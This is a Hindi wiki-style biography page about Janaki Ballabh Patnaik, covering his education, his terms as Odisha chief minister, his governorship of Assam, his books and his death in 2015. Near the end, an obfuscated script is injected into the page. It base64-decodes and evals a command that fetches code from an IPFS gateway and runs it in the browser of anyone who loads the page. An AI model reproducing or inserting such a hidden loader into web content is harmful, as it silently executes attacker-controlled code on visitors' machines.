जानकी बल्लभ पटनायक

भारत डिस्कवरी प्रस्तुति
रिंकू बघेल (चर्चा | योगदान) द्वारा परिवर्तित 13:02, 31 जनवरी 2017 का अवतरण (''''जानकी बल्लभ पटनायक''' (अंग्रेज़ी: ''Janaki Ballabh Patnaik'', जन्म- [...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

जानकी बल्लभ पटनायक (अंग्रेज़ी: Janaki Ballabh Patnaik, जन्म- 3 जनवरी 1927, रामेश्वर पुरी ज़िला; मृत्यु- 21 अप्रैल 2015, तिरुपति आंध्र प्रदेश) भारतीय राजनीतिज्ञ एवं राष्ट्रीय काँग्रेस के वरिष्ठ नेता थे। ये 2009 में असम के राज्यपाल बने। पटनायक जी भारतीय राष्ट्रीय कांग्रेस नेता के रूप में 1980 से 1989 और पुनः 1995 से 1999 तक ओडिशा के मुख्यमंत्री रहे। नवीन पटनायक से पहले सबसे लम्बे समय तक ओडिशा के मुख्यमंत्री रहने का रिकार्ड इन्हीं के नाम था।

जीवन परिचय

जानकी बल्लभ पटनायक का जन्म 3 जनवरी 1927 ई. को रामेश्वर, पुरी ज़िले हुआ था। इन्होंने खुर्द हाई स्कूल से अपनी विद्यालय की शिक्षा पूर्ण की और उत्कल विश्वविद्यालय से 1947 ई. में संस्कृत में स्नातक और 1949 ई. में राजनीति विज्ञान में काशी हिन्दू विश्वविद्यालय से स्नातकोत्तर की शिक्षा पूर्ण की।

राजनीतिक कॅरियर

जानकी बल्लभ पटनायक भारतीय राष्ट्रीय कांग्रेस नेता के रूप में 1980 ई.- 1989 ई. और पुनः 1995 ई. - 1999 ई. तक ओडिशा के मुख्यमंत्री रहे। ये 11 दिसंबर, 2009 से 10 दिसंबर, 2014 तक असम के राज्यपाल रहे। इनको 1980 ई. में राज्य सरकार में पर्यटन, नागरिक उड्डयन और श्रम मंत्री बनाया गया। इनका मुख्यमंत्री के रूप में 14 सालों तक का रिकार्ड कार्यकाल रहा, इनका रिकार्ड मुख्यमंत्री के रूप में नवीन पटनायक ने तोड़ा।

चर्चित पुस्तकें

राजनेता के साथ-साथ पटनायक एक सफल साहित्यकार और संस्कृत के विद्वान थे। इनकी चर्चित पुस्तकों के नाम निम्नलिखित हैं-

  1. सिंधु उपत्यका
  2. गौतम बुद्ध

निधन

इनका निधन 88 वर्ष की उम्र में 21 अप्रैल 2015 को तिरुपति आंध्र प्रदेश में हुआ था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:ओडीशा के मुख्यमंत्री